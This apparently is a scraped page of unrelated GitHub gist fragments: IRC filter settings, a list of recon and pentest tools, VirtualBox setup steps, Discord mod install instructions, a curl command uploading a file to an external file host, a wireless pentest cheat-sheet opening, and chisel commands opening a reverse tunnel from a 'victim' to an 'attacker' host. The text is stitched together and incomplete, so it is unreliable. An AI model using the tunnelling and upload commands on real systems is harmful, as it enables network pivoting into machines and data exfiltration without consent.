/set irc.look.smart_filter on /filter add irc_smart * irc_smart_filter * /filter add joinquit * irc_join,irc_part,irc_quit *
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| altdns | |
| amass | |
| awscli | |
| bucket_finder | |
| CloudFlair | |
| commix | |
| dirb | |
| dirsearch | |
| dnsenum | |
| dnsrecon |
- sudo modprobe -a vboxdrv
- sudo vim /etc/modules-load.d/virtualbox.conf
- sudo gpasswd -a $USER vboxusers
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet#links |
Git clone this repo: git clone https://github.com/Cr3atable/LinuxED/ in a terminal. cd into the newly cloned repo: cd LinuxED Execute the Python script: python3 LinuxED.py and follow the instructions. Restart Discord entirely. That's it! EnhancedDiscord is now installed.
- curl -F email=[email protected] -F [email protected] https://srv-file6.gofile.io/upload
#Wireless Penetration Testing Cheat Sheet
##WIRELESS ANTENNA
- Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Chisel norm mode | |
| on attacker: ./chisel_1.7.0-rc7_linux_amd64 server -p 1337 --reverse | |
| on victim: .\chisel.exe client 10.10.14.134:1337 R:1337:127.0.0.1:1337 | |